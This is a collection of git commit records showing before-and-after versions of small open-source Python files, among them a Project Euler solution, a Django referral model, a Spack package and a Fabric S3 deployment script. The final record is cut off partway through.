options = ArticleOptions(page_size=page_size)
document = Article(document_tree, options, backend=pdf)
document.render(input_base)
|
import argparse
import os
from rinoh import paper
from rinoh.backend import pdf
from rinoh.frontend.rst import ReStructuredTextParser
from rinohlib.templates.article import Article, ArticleOptions
def main():
parser = argparse.ArgumentParser(description='Render a reStructuredText '
'document to PDF.')
parser.add_argument('input', type=str, nargs='?',
help='the reStructuredText document to render')
parser.add_argument('--paper', type=str, nargs='?', default='A4',
help='the paper size to render to (default: A4)')
args = parser.parse_args()
try:
input_dir, input_file = os.path.split(args.input)
except AttributeError:
parser.print_help()
return
input_base, input_ext = os.path.splitext(input_file)
if input_dir:
os.chdir(input_dir)
parser = ReStructuredTextParser()
document_tree = parser.parse(input_file)
options = ArticleOptions(page_size=getattr(paper, args.paper.upper()))
document = Article(document_tree, options, backend=pdf)
document.render(input_base)
| agpl-3.0 | Python |
81aaf1f4086708a752eef50fba3082b916c140fb | Update parseArgs method | jabocg/ptyme | ptyme/ptyme.py | ptyme/ptyme.py | #!/bin/env python3
# python 3
import sys
def main():
print(sys.argv)
if len(sys.argv) == 1:
print("give a string for time, _h_m_s for hours, mins, secs, optional"
"string for title")
sys.exit()
parseArgsChar(sys.argv[1])
# go through via characters
def parseArgsChar(timeStr):
hours = minutes = seconds = 0
head = 0
for ind, char in enumerate(timeStr):
print(ind, char, head)
if char == 'h':
print("found h")
hours = timeStr[head:ind]
head = ind + 1
if char == 'm':
print("found m")
minutes = timeStr[head:ind]
head = ind + 1
if char == 's':
print("found s")
seconds = timeStr[head:ind]
head = ind + 1
print(timeStr)
print('hours:', hours)
print('mins: ', minutes)
print('sec: ', seconds)
# while this works, it only works when _h_m_s format
# might want to not do that
def parseArgs(timeStr):
time = timeStr.split('h')
if 'm' not in time[0] and 'n' not in time[0]:
hours = time[0]
else:
hours = 0
print(time)
print(hours)
time = time[1].split('m')
if 's' not in time[0]:
minutes = time[0]
else:
minutes = 0
print(time)
print(minutes)
time = time[1].split('s')
if time:
seconds = time[0]
else:
seconds = 0
print(time)
print(seconds)
if __name__ == "__main__":
main()
| #!/bin/env python3
from sys import argv
def main():
parseArgs()
print("Nope.")
print(argv)
# go through via characters
def parseArgsChar():
pass()
# while this works, it only works when _h_m_s format
# might want to not do that
def parseArgs():
if len(argv) > 1:
time = argv[1].split('h')
if 'm' not in time[0] and 'n' not in time[0]:
hours = time[0]
else:
hours = 0
print(time)
print(hours)
time = time[1].split('m')
if 's' not in time[0]:
minutes = time[0]
else:
minutes = 0
print(time)
print(minutes)
time = time[1].split('s')
if time:
seconds = time[0]
else:
seconds = 0
print(time)
print(seconds)
else:
print("commands go here")
if __name__ == "__main__":
main()
| mit | Python |
3e2be4a8a597cfaa11b625eb6a94a4a18061df9b | Update develop version to 1.7-dev since 1.6 is in production | emory-libraries/readux,emory-libraries/readux,emory-libraries/readux | readux/__init__.py | readux/__init__.py | __version_info__ = (1, 7, 0, 'dev')
# Dot-connect all but the last. Last is dash-connected if not None.
__version__ = '.'.join([str(i) for i in __version_info__[:-1]])
if __version_info__[-1] is not None:
__version__ += ('-%s' % (__version_info__[-1],))
# context processor to add version to the template environment
def context_extras(request):
socialauth_providers = []
# generate a list of social auth providers associated with this account,
# for use in displaying available backends
if not request.user.is_anonymous():
socialauth_providers = [auth.provider for auth in request.user.social_auth.all()]
return {
# software version
'SW_VERSION': __version__,
# Alternate names for social-auth backends,
# to be used for display and font-awesome icon (lowercased)
# If not entered here, backend name will be used as-is for
# icon and title-cased for display (i.e., twitter / Twitter).
'backend_names': {
'github': 'GitHub',
'google-oauth2': 'Google',
},
'user_socialauth_providers': socialauth_providers
}
| __version_info__ = (1, 6, 1, None)
# Dot-connect all but the last. Last is dash-connected if not None.
__version__ = '.'.join([str(i) for i in __version_info__[:-1]])
if __version_info__[-1] is not None:
__version__ += ('-%s' % (__version_info__[-1],))
# context processor to add version to the template environment
def context_extras(request):
socialauth_providers = []
# generate a list of social auth providers associated with this account,
# for use in displaying available backends
if not request.user.is_anonymous():
socialauth_providers = [auth.provider for auth in request.user.social_auth.all()]
return {
# software version
'SW_VERSION': __version__,
# Alternate names for social-auth backends,
# to be used for display and font-awesome icon (lowercased)
# If not entered here, backend name will be used as-is for
# icon and title-cased for display (i.e., twitter / Twitter).
'backend_names': {
'github': 'GitHub',
'google-oauth2': 'Google',
},
'user_socialauth_providers': socialauth_providers
}
| apache-2.0 | Python |
73aa3651c71a147ba92e1b99dd0361a11126cc2a | simplify code | hhsprings/cython,mrGeen/cython,mcanthony/cython,achernet/cython,hhsprings/cython,fabianrost84/cython,encukou/cython,slonik-az/cython,marscher/cython,ABcDexter/cython,c-blake/cython,hhsprings/cython,acrispin/cython,mcanthony/cython,acrispin/cython,andreasvc/cython,cython/cython,marscher/cython,acrispin/cython,da-woods/cython,marscher/cython,hickford/cython,cython/cython,encukou/cython,fperez/cython,encukou/cython,dahebolangkuan/cython,achernet/cython,andreasvc/cython,hhsprings/cython,andreasvc/cython,cython/cython,c-blake/cython,da-woods/cython,hickford/cython,slonik-az/cython,fperez/cython,slonik-az/cython,roxyboy/cython,roxyboy/cython,c-blake/cython,ABcDexter/cython,andreasvc/cython,slonik-az/cython,JelleZijlstra/cython,madjar/cython,scoder/cython,slonik-az/cython,madjar/cython,dahebolangkuan/cython,madjar/cython,c-blake/cython,dahebolangkuan/cython,hhsprings/cython,JelleZijlstra/cython,encukou/cython,hickford/cython,da-woods/cython,JelleZijlstra/cython,achernet/cython,madjar/cython,mrGeen/cython,fabianrost84/cython,c-blake/cython,ABcDexter/cython,scoder/cython,ABcDexter/cython,fperez/cython,mrGeen/cython,fperez/cython,ABcDexter/cython,hickford/cython,acrispin/cython,marscher/cython,achernet/cython,acrispin/cython,mcanthony/cython,roxyboy/cython,fabianrost84/cython,roxyboy/cython,ChristopherHogan/cython,mrGeen/cython,andreasvc/cython,mcanthony/cython,marscher/cython,fabianrost84/cython,achernet/cython,scoder/cython,mcanthony/cython,JelleZijlstra/cython,encukou/cython,hickford/cython,fabianrost84/cython,dahebolangkuan/cython,madjar/cython,roxyboy/cython,mrGeen/cython,da-woods/cython,fperez/cython,ChristopherHogan/cython,JelleZijlstra/cython,cython/cython,ChristopherHogan/cython,scoder/cython,dahebolangkuan/cython | Cython/Plex/Errors.py | Cython/Plex/Errors.py | #=======================================================================
#
# Python Lexical Analyser
#
# Exception classes
#
#=======================================================================
class PlexError(Exception):
message = ""
class PlexTypeError(PlexError, TypeError):
pass
class PlexValueError(PlexError, ValueError):
pass
class InvalidRegex(PlexError):
pass
class InvalidToken(PlexError):
def __init__(self, token_number, message):
PlexError.__init__(self, "Token number %d: %s" % (token_number, message))
class InvalidScanner(PlexError):
pass
class AmbiguousAction(PlexError):
message = "Two tokens with different actions can match the same string"
def __init__(self):
pass
class UnrecognizedInput(PlexError):
scanner = None
position = None
state_name = None
def __init__(self, scanner, state_name):
self.scanner = scanner
self.position = scanner.get_position()
self.state_name = state_name
def __str__(self):
return ("'%s', line %d, char %d: Token not recognised in state %r" % (
self.position + (self.state_name,)))
| #=======================================================================
#
# Python Lexical Analyser
#
# Exception classes
#
#=======================================================================
class PlexError(Exception):
message = ""
class PlexTypeError(PlexError, TypeError):
pass
class PlexValueError(PlexError, ValueError):
pass
class InvalidRegex(PlexError):
pass
class InvalidToken(PlexError):
def __init__(self, token_number, message):
PlexError.__init__(self, "Token number %d: %s" % (token_number, message))
class InvalidScanner(PlexError):
pass
class AmbiguousAction(PlexError):
message = "Two tokens with different actions can match the same string"
def __init__(self):
pass
class UnrecognizedInput(PlexError):
scanner = None
position = None
state_name = None
def __init__(self, scanner, state_name):
self.scanner = scanner
self.position = scanner.get_position()
self.state_name = state_name
def __str__(self):
return ("'%s', line %d, char %d: Token not recognised in state %s" % (
self.position + (repr(self.state_name),)))
| apache-2.0 | Python |
7f40f9bdaba3f595b286b5e83570ac6c468ca899 | Update district.py | mikelambson/tcid,mikelambson/tcid,mikelambson/tcid,mikelambson/tcid | site/models/district.py | site/models/district.py | import datetime, re;
from sqlalchemy.orm import validates;
from server import DB, FlaskServer;
class District(DB.Model):
id = DB.Column(DB.Integer, primary_key=True, autoincrement=True);
name = DB.Column(DB.String(20));
created_by = DB.Column(DB.Integer, DB.ForeignKey('users.id'));
created_at = DB.Column(DB.DateTime);
updated_by = DB.Column(DB.Integer, DB.ForeignKey('users.id'), nullable=True);
updated_at = DB.Column(DB.DateTime, nullable=True);
def __init__(self, name, created_at, updated_at):
self.name = name;
self.created_at = datetime.datetime.now();
self.updated_at = self.created_at;
| import datetime, re;
from sqlalchemy.orm import validates;
from server import DB, FlaskServer;
class District(DB.Model):
id = DB.Column(DB.Integer, primary_key=True, autoincrement=True);
name = DB.Column(DB.VarChar(20));
created_by = DB.Column(DB.Integer, DB.ForeignKey('users.id'));
created_at = DB.Column(DB.DateTime);
updated_by = DB.Column(DB.Integer, DB.ForeignKey('users.id'), nullable=True);
updated_at = DB.Column(DB.DateTime, nullable=True);
def __init__(self, name, created_at, updated_at):
self.name = name;
self.created_at = datetime.datetime.now();
self.updated_at = self.created_at;
| bsd-3-clause | Python |
06e291fa8d9c2ca4b8ba136e4e724fa6ed9e25b2 | fix version back to 2.9 so we can use bump/minor | ginkgobioworks/edge,ginkgobioworks/edge,ginkgobioworks/edge,ginkgobioworks/edge | src/edge/__init__.py | src/edge/__init__.py | from django.db.backends.signals import connection_created
__version__ = '2.9.0'
def import_gff(name, fn):
"""
Creates a new genome using the specified GFF file.
name: Name of genome
fn: path to GFF file
"""
from edge.models import Genome
if Genome.objects.filter(name=name).count() > 0:
raise Exception('There is already a genome named "%s"' % (name,))
g = Genome.import_gff(name, fn)
return g
def _setup_sqlite3(sender, connection, **kwargs):
"""
Setup SQLite to allow FKs and use in-memory journals
"""
if connection.vendor == 'sqlite':
cursor = connection.cursor()
cursor.execute('PRAGMA foreign_keys = ON;')
cursor.execute('PRAGMA journal_mode = MEMORY;')
connection_created.connect(_setup_sqlite3)
| from django.db.backends.signals import connection_created
__version__ = '2.9.1'
def import_gff(name, fn):
"""
Creates a new genome using the specified GFF file.
name: Name of genome
fn: path to GFF file
"""
from edge.models import Genome
if Genome.objects.filter(name=name).count() > 0:
raise Exception('There is already a genome named "%s"' % (name,))
g = Genome.import_gff(name, fn)
return g
def _setup_sqlite3(sender, connection, **kwargs):
"""
Setup SQLite to allow FKs and use in-memory journals
"""
if connection.vendor == 'sqlite':
cursor = connection.cursor()
cursor.execute('PRAGMA foreign_keys = ON;')
cursor.execute('PRAGMA journal_mode = MEMORY;')
connection_created.connect(_setup_sqlite3)
| mit | Python |
66d94ada3def2bb1708333a3d9856663e59a9585 | add pattern field to campaign | byteweaver/django-referral,Chris7/django-referral | referral/models.py | referral/models.py | from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
import settings
class Campaign(models.Model):
name = models.CharField(_("Name"), max_length=255, unique=True)
description = models.TextField(_("Description"), blank=True, null=True)
pattern = models.CharField(_("Referrer pattern"), blank=True, max_length=255,
help_text="All auto created referrers containing this pattern will be associated with this campaign")
class Meta:
ordering = ['name']
verbose_name = _("Campaign")
verbose_name_plural = _("Campaigns")
def __unicode__(self):
return self.name
def count_users(self):
count = 0
for referrer in self.referrers.all():
count += referrer.count_users()
return count
count_users.short_description = _("User count")
class Referrer(models.Model):
name = models.CharField(_("Name"), max_length=255, unique=True)
description = models.TextField(_("Description"), blank=True, null=True)
creation_date = models.DateTimeField(_("Creation date"), auto_now_add=True)
campaign = models.ForeignKey(Campaign, verbose_name=_("Campaign"), related_name='referrers', blank=True, null=True)
class Meta:
ordering = ['name']
verbose_name = _("Referrer")
verbose_name_plural = _("Referrers")
def __unicode__(self):
return self.name
def count_users(self):
return self.users.count()
count_users.short_description = _("User count")
class UserReferrerManager(models.Manager):
def apply_referrer(self, user, request):
try:
referrer = request.session.pop(settings.SESSION_KEY)
except KeyError:
pass
else:
user_referrer = UserReferrer(user=user, referrer=referrer)
user_referrer.save()
class UserReferrer(models.Model):
user = models.OneToOneField(User, verbose_name=_("User"), related_name='referrer')
referrer = models.ForeignKey(Referrer, verbose_name=_("Referrer"), related_name='users')
objects = UserReferrerManager()
class Meta:
ordering = ['referrer__name']
verbose_name = _("User Referrer")
verbose_name_plural = _("User Referrers")
def __unicode__(self):
return "%s -> %s" % (self.user.username, self.referrer.name)
| from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
import settings
class Campaign(models.Model):
name = models.CharField(_("Name"), max_length=255, unique=True)
description = models.TextField(_("Description"), blank=True, null=True)
class Meta:
ordering = ['name']
verbose_name = _("Campaign")
verbose_name_plural = _("Campaigns")
def __unicode__(self):
return self.name
def count_users(self):
count = 0
for referrer in self.referrers.all():
count += referrer.count_users()
return count
count_users.short_description = _("User count")
class Referrer(models.Model):
name = models.CharField(_("Name"), max_length=255, unique=True)
description = models.TextField(_("Description"), blank=True, null=True)
creation_date = models.DateTimeField(_("Creation date"), auto_now_add=True)
campaign = models.ForeignKey(Campaign, verbose_name=_("Campaign"), related_name='referrers', blank=True, null=True)
class Meta:
ordering = ['name']
verbose_name = _("Referrer")
verbose_name_plural = _("Referrers")
def __unicode__(self):
return self.name
def count_users(self):
return self.users.count()
count_users.short_description = _("User count")
class UserReferrerManager(models.Manager):
def apply_referrer(self, user, request):
try:
referrer = request.session.pop(settings.SESSION_KEY)
except KeyError:
pass
else:
user_referrer = UserReferrer(user=user, referrer=referrer)
user_referrer.save()
class UserReferrer(models.Model):
user = models.OneToOneField(User, verbose_name=_("User"), related_name='referrer')
referrer = models.ForeignKey(Referrer, verbose_name=_("Referrer"), related_name='users')
objects = UserReferrerManager()
class Meta:
ordering = ['referrer__name']
verbose_name = _("User Referrer")
verbose_name_plural = _("User Referrers")
def __unicode__(self):
return "%s -> %s" % (self.user.username, self.referrer.name)
| mit | Python |
7f34a59f632cc4a46a53b31cb0ec28d4dfa03691 | fix upper limit | smrmkt/project_euler | problem_034.py | problem_034.py | #!/usr/bin/env python
#-*-coding:utf-8-*-
'''
145 is a curious number, as 1! + 4! + 5! = 1 + 24 + 120 = 145.
Find the sum of all numbers which are equal to
the sum of the factorial of their digits.
Note: as 1! = 1 and 2! = 2 are not sums they are not included.
'''
import math
import timeit
def calc():
eqs = []
for i in range(3, 2540160):
if i == sum(map(lambda j: math.factorial(j), map(int, list(str(i))))):
eqs.append(i)
return eqs
if __name__ == '__main__':
print calc()
print timeit.Timer('problem_034.calc()', 'import problem_034').timeit(1)
| #!/usr/bin/env python
#-*-coding:utf-8-*-
'''
145 is a curious number, as 1! + 4! + 5! = 1 + 24 + 120 = 145.
Find the sum of all numbers which are equal to
the sum of the factorial of their digits.
Note: as 1! = 1 and 2! = 2 are not sums they are not included.
'''
import math
import timeit
def calc():
eqs = []
for i in range(3, 2177280):
if i == sum(map(lambda j: math.factorial(j), map(int, list(str(i))))):
eqs.append(i)
return eqs
if __name__ == '__main__':
print calc()
print timeit.Timer('problem_034.calc()', 'import problem_034').timeit(1)
| mit | Python |
af93302a24ab87e039b66f1f04c3f8802b8610e4 | add problem sentence | smrmkt/project_euler | problem_051.py | problem_051.py | #!/usr/bin/env python
#-*-coding:utf-8-*-
'''
By replacing the 1st digit of the 2-digit number *3,
it turns out that six of the nine possible values:
13, 23, 43, 53, 73, and 83, are all prime.
By replacing the 3rd and 4th digits of 56**3 with the same digit,
this 5-digit number is the first example having seven primes
among the ten generated numbers, yielding the family:
56003, 56113, 56333, 56443, 56663, 56773, and 56993.
Consequently 56003, being the first member of this family,
is the smallest prime with this property.
Find the smallest prime which, by replacing part of the number
(not necessarily adjacent digits) with the same digit,
is part of an eight prime value family.
'''
import math
import timeit
primes = [2, 3, 5, 7]
def is_prime(n):
for p in primes:
if n % p == 0:
return False
for i in range(max(primes), int(math.sqrt(n))+1):
if n % i == 0:
return False
return True
def replace(n, i):
s = str(n)
return [int(s.replace(i, str(j))) for j in range(10)]
def loop(n):
for i in range(56993, 1000000):
if is_prime(i):
for j in set(str(i)):
reps = [r for r in replace(i, j) if is_prime(r)]
if len(reps) == n and len(str(i)) == len(str(min(reps))):
return min(reps)
if __name__ == '__main__':
print loop(8)
print timeit.Timer('problem_051.loop(8)', 'import problem_051').timeit(1)
| #!/usr/bin/env python
#-*-coding:utf-8-*-
'''
'''
import math
import timeit
primes = [2, 3, 5, 7]
def is_prime(n):
for p in primes:
if n % p == 0:
return False
for i in range(max(primes), int(math.sqrt(n))+1):
if n % i == 0:
return False
return True
def replace(n, i):
s = str(n)
return [int(s.replace(i, str(j))) for j in range(10)]
def loop(n):
for i in range(56993, 1000000):
if is_prime(i):
for j in set(str(i)):
reps = [r for r in replace(i, j) if is_prime(r)]
if len(reps) == n and len(str(i)) == len(str(min(reps))):
return min(reps)
if __name__ == '__main__':
print loop(8)
print timeit.Timer('problem_051.loop(8)', 'import problem_051').timeit(1)
| mit | Python |
efb32929d39ea0657a2abff4930d4e0454f5cc91 | increase max-age on CDN | AFP-Graphics/pym.js,nprapps/pym.js,nprapps/pym.js,AFP-Graphics/pym.js,nprapps/pym.js | nprapps_tools/fabfile.py | nprapps_tools/fabfile.py | #!/usr/bin/env python
# _*_ coding:utf-8 _*_
import os
import shutil
import glob
import gzip
import logging
from distutils.util import strtobool
from fabric.api import task, local
LOG_FORMAT = '%(levelname)s:%(name)s:%(asctime)s: %(message)s'
LOG_LEVEL = logging.INFO
# GLOBAL SETTINGS
cwd = os.path.dirname(__file__)
logging.basicConfig(format=LOG_FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
S3_BUCKET = 'pym.nprapps.org'
GZIP_FILE_TYPES = ['*.js']
DEFAULT_MAX_AGE = 604800
def prep_bool_arg(arg):
return bool(strtobool(str(arg)))
def compress(in_path=None, out_path=None):
"""
Gzips everything in in_path and puts it all in out_path
"""
for file in glob.glob('%s/*.js' % in_path):
fname = os.path.basename(file)
with open(file, 'rb') as fin, gzip.GzipFile('%s/%s' % (
out_path, fname), 'wb', mtime=0) as fout:
shutil.copyfileobj(fin, fout)
@task
def deploy(relpath='../dist', dryrun=False):
"""
sync folder to s3 bucket
"""
dryrun = prep_bool_arg(dryrun)
INPUT_PATH = os.path.join(cwd, relpath)
OUTPUT_PATH = os.path.join(cwd, '../.gzip')
# Create output files folder if needed
if not os.path.exists(OUTPUT_PATH):
os.makedirs(OUTPUT_PATH)
compress(INPUT_PATH, OUTPUT_PATH)
logger.info('compressed files inside %s' % os.path.abspath(INPUT_PATH))
command = 'aws s3 sync %s s3://%s --acl="public-read"' % (
os.path.abspath(OUTPUT_PATH), S3_BUCKET)
# add cache control header
command += ' --cache-control "max-age=%i"' % (DEFAULT_MAX_AGE)
if dryrun:
command += ' --dryrun'
# add include exclude options and content-encoding
command += ' --content-encoding "gzip" --exclude="*"'
arg = '--include'
for ext in GZIP_FILE_TYPES:
command += ' %s="%s"' % (arg, ext)
# logger.info(command)
local(command)
| #!/usr/bin/env python
# _*_ coding:utf-8 _*_
import os
import shutil
import glob
import gzip
import logging
from distutils.util import strtobool
from fabric.api import task, local
LOG_FORMAT = '%(levelname)s:%(name)s:%(asctime)s: %(message)s'
LOG_LEVEL = logging.INFO
# GLOBAL SETTINGS
cwd = os.path.dirname(__file__)
logging.basicConfig(format=LOG_FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
S3_BUCKET = 'pym.nprapps.org'
GZIP_FILE_TYPES = ['*.js']
DEFAULT_MAX_AGE = 3600
def prep_bool_arg(arg):
return bool(strtobool(str(arg)))
def compress(in_path=None, out_path=None):
"""
Gzips everything in in_path and puts it all in out_path
"""
for file in glob.glob('%s/*.js' % in_path):
fname = os.path.basename(file)
with open(file, 'rb') as fin, gzip.GzipFile('%s/%s' % (
out_path, fname), 'wb', mtime=0) as fout:
shutil.copyfileobj(fin, fout)
@task
def deploy(relpath='../dist', dryrun=False):
"""
sync folder to s3 bucket
"""
dryrun = prep_bool_arg(dryrun)
INPUT_PATH = os.path.join(cwd, relpath)
OUTPUT_PATH = os.path.join(cwd, '../.gzip')
# Create output files folder if needed
if not os.path.exists(OUTPUT_PATH):
os.makedirs(OUTPUT_PATH)
compress(INPUT_PATH, OUTPUT_PATH)
logger.info('compressed files inside %s' % os.path.abspath(INPUT_PATH))
command = 'aws s3 sync %s s3://%s --acl="public-read"' % (
os.path.abspath(OUTPUT_PATH), S3_BUCKET)
# add cache control header
command += ' --cache-control "max-age=%i"' % (DEFAULT_MAX_AGE)
if dryrun:
command += ' --dryrun'
# add include exclude options and content-encoding
command += ' --content-encoding "gzip" --exclude="*"'
arg = '--include'
for ext in GZIP_FILE_TYPES:
command += ' %s="%s"' % (arg, ext)
# logger.info(command)
local(command)
| mit | Python |
ce0488b4b421f774759124e84416367aa21e4a1d | fix the reporters admin. it had a duplicate "identity" and no "backend" in the list of displayed columns. | peterayeni/rapidsms,catalpainternational/rapidsms,ehealthafrica-ci/rapidsms,dimagi/rapidsms,peterayeni/rapidsms,unicefuganda/edtrac,peterayeni/rapidsms,catalpainternational/rapidsms,catalpainternational/rapidsms,unicefuganda/edtrac,ken-muturi/rapidsms,eHealthAfrica/rapidsms,ken-muturi/rapidsms,lsgunth/rapidsms,eHealthAfrica/rapidsms,unicefuganda/edtrac,ehealthafrica-ci/rapidsms,caktus/rapidsms,lsgunth/rapidsms,dimagi/rapidsms,caktus/rapidsms,caktus/rapidsms,catalpainternational/rapidsms,lsgunth/rapidsms,peterayeni/rapidsms,lsgunth/rapidsms,eHealthAfrica/rapidsms,ken-muturi/rapidsms,ehealthafrica-ci/rapidsms | reporters/admin.py | reporters/admin.py | #!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from django.contrib import admin
from reporters.models import *
from django.core.urlresolvers import reverse
class ReporterAdmin(admin.ModelAdmin):
list_display = ('id','alias','first_name', 'last_name')
list_filter = []
class PersistantConnectionAdmin(admin.ModelAdmin):
list_display = ('id','backend','identity', 'reporter')
list_filter = ['reporter','backend']
admin.site.register(Reporter, ReporterAdmin)
def reportergroup_members(self):
#1.1 admin compatability
#return ', '.join(['<a href="%s">%s</a>' % (reverse('admin:reporters_reporter_change', args=(x.id,)), x.alias) for x in self.reporters.all().order_by('id')])
#1.0.x admin compatability
return '<br> '.join(['<a href="%s">%s</a>' % (reverse( 'django-admin', args=["%s/%s/%s/" % ('reporters', 'reporter', x.id)]), x.alias) for x in self.reporters.all().order_by('id')])
#return '<br> '.join([x.alias for x in self.reporters.all().order_by('alias')])
reportergroup_members.allow_tags = True
class ReporterGroupAdmin(admin.ModelAdmin):
list_display = ('id','title','parent', 'description', reportergroup_members)
list_filter = ['parent']
admin.site.register(Role)
admin.site.register(ReporterGroup, ReporterGroupAdmin)
admin.site.register(PersistantBackend)
admin.site.register(PersistantConnection, PersistantConnectionAdmin)
| #!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from django.contrib import admin
from reporters.models import *
from django.core.urlresolvers import reverse
class ReporterAdmin(admin.ModelAdmin):
list_display = ('id','alias','first_name', 'last_name')
list_filter = []
class PersistantConnectionAdmin(admin.ModelAdmin):
list_display = ('id','identity','identity', 'reporter')
list_filter = ['reporter','backend']
admin.site.register(Reporter, ReporterAdmin)
def reportergroup_members(self):
#1.1 admin compatability
#return ', '.join(['<a href="%s">%s</a>' % (reverse('admin:reporters_reporter_change', args=(x.id,)), x.alias) for x in self.reporters.all().order_by('id')])
#1.0.x admin compatability
return '<br> '.join(['<a href="%s">%s</a>' % (reverse( 'django-admin', args=["%s/%s/%s/" % ('reporters', 'reporter', x.id)]), x.alias) for x in self.reporters.all().order_by('id')])
#return '<br> '.join([x.alias for x in self.reporters.all().order_by('alias')])
reportergroup_members.allow_tags = True
class ReporterGroupAdmin(admin.ModelAdmin):
list_display = ('id','title','parent', 'description', reportergroup_members)
list_filter = ['parent']
admin.site.register(Role)
admin.site.register(ReporterGroup, ReporterGroupAdmin)
admin.site.register(PersistantBackend)
admin.site.register(PersistantConnection, PersistantConnectionAdmin)
| bsd-3-clause | Python |
d71869398944b03486575732584c3349684a8eb3 | fix default cache provider | yacomink/inyourface,yacomink/inyourface | inyourface/DefaultCacheProvider.py | inyourface/DefaultCacheProvider.py | import os, sqlite3
class CacheProvider(object):
def __init__(self, cache_dir):
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
conn = sqlite3.connect(cache_dir + 'faces.db')
self.cache_connection = conn
c = conn.cursor()
# Create table
c.execute('''CREATE TABLE IF NOT EXISTS faces
(facesum char(32) PRIMARY KEY, face_data text)''')
self.cache_connection.commit()
def get(self, key):
c = self.cache_connection.cursor()
c.execute("select * FROM faces WHERE facesum = ?", (key,))
res = c.fetchone()
return res[1]
def set(self, key, value):
c = self.cache_connection.cursor()
c.execute('REPLACE INTO faces (facesum, face_data) VALUES (?,?)', (key, value))
self.cache_connection.commit()
def close(self):
self.cache_connection.close() | import os, sqlite3
class CacheProvider(object):
def __init__(self, cache_dir):
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
conn = sqlite3.connect(cache_dir + 'faces.db')
self.cache_connection = conn
c = conn.cursor()
# Create table
c.execute('''CREATE TABLE IF NOT EXISTS faces
(facesum char(32) PRIMARY KEY, face_data text)''')
self.cache_connection.commit()
def get(self, key):
c = self.cache_connection.cursor()
c.execute("select * FROM faces WHERE facesum = ?", (key,))
res = c.fetchone()
return res
def set(self, key, value):
c = self.cache_connection.cursor()
c.execute('REPLACE INTO faces (facesum, face_data) VALUES (?,?)', (key, value))
self.cache_connection.commit()
def close(self):
self.cache_connection.close() | mit | Python |
8336e18e8a954e691acb4fead463bdf9e5c432a1 | add gpd support to pacbio renaming | jason-weirather/Au-public,jason-weirather/Au-public,jason-weirather/Au-public,jason-weirather/Au-public | iron/utilities/rename_to_pacbio.py | iron/utilities/rename_to_pacbio.py | #!/usr/bin/python
import sys,argparse
from SequenceBasics import FastaHandleReader, FastqHandleReader
def main():
parser = argparse.ArgumentParser()
parser.add_argument('input',help="Use - for STDIN")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--fasta',action='store_true')
group.add_argument('--fastq',action='store_true')
group.add_argument('--gpd',action='store_true')
parser.add_argument('--output_table',help='save coversion to file')
parser.add_argument('-o','--output')
args = parser.parse_args()
if args.input=='-': args.input = sys.stdin
else: args.input= open(args.input)
if args.output: args.output = open(args.output,'w')
if args.output_table: args.output_table= open(args.output_table,'w')
else: args.output = sys.stdout
if args.gpd:
z = 0
for line in args.input:
f = line.rstrip().split("\t")
z+=1
name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
if args.output_table: args.output_table.write(f[0]+"\t"+name+"\n")
f[0] = name
f[1] = name
args.output.write("\t".join(f)+"\n")
args.output.close()
if args.output_table:
args.output_table.close()
return
if args.fasta:
args.input = FastaHandleReader(args.input)
elif args.fastq:
args.input = FastqHandleReader(args.input)
z = 0
while True:
e = args.input.read_entry()
if not e: break
z+=1
name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
if args.fastq:
args.output.write( '@'+name+"\n"+ e['seq']+"\n"+ '+'+e['qual']+"\n")
elif args.fasta:
args.output.write('>'+name+"\n"+e['seq']+"\n")
if args.output_table: args.output_table.write(e['name']+"\t"+name+"\n")
args.output.close()
if args.output_table: args.output_table.close()
if __name__=="__main__":
main()
| #!/usr/bin/python
import sys,argparse
from SequenceBasics import FastaHandleReader, FastqHandleReader
def main():
parser = argparse.ArgumentParser()
parser.add_argument('input',help="Use - for STDIN")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--fasta',action='store_true')
group.add_argument('--fastq',action='store_true')
parser.add_argument('--output_table',help='save coversion to file')
parser.add_argument('-o','--output')
args = parser.parse_args()
if args.input=='-': args.input = sys.stdin
else: args.input= open(args.input)
if args.output: args.output = open(args.output,'w')
else: args.output = sys.stdout
if args.fasta:
args.input = FastaHandleReader(args.input)
elif args.fastq:
args.input = FastqHandleReader(args.input)
z = 0
if args.output_table: args.output_table= open(args.output_table,'w')
while True:
e = args.input.read_entry()
if not e: break
z+=1
name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
if args.fastq:
args.output.write( '@'+name+"\n"+ e['seq']+"\n"+ '+'+e['qual']+"\n")
elif args.fasta:
args.output.write('>'+name+"\n"+e['seq']+"\n")
if args.output_table: args.output_table.write(e['name']+"\t"+name+"\n")
if __name__=="__main__":
main()
| apache-2.0 | Python |
a70e76d043a452bcd3962896fa7281e4499fc2af | Package Bonniepp adding sbin to PATH (#16124) | LLNL/spack,LLNL/spack,iulian787/spack,LLNL/spack,iulian787/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,iulian787/spack | var/spack/repos/builtin/packages/bonniepp/package.py | var/spack/repos/builtin/packages/bonniepp/package.py | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Bonniepp(AutotoolsPackage):
"""Bonnie++ is a benchmark suite that is aimed at performing a number of
simple tests of hard drive and file system performance."""
homepage = "https://doc.coker.com.au/projects/bonnie"
url = "https://www.coker.com.au/bonnie++/bonnie++-1.98.tgz"
version('1.98', sha256='6e0bcbc08b78856fd998dd7bcb352d4615a99c26c2dc83d5b8345b102bad0b04')
def configure_args(self):
configure_args = []
configure_args.append('--enable-debug')
return configure_args
def setup_run_environment(self, env):
"""Prepend the sbin directory to PATH."""
env.prepend_path('PATH', self.prefix.sbin)
| # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
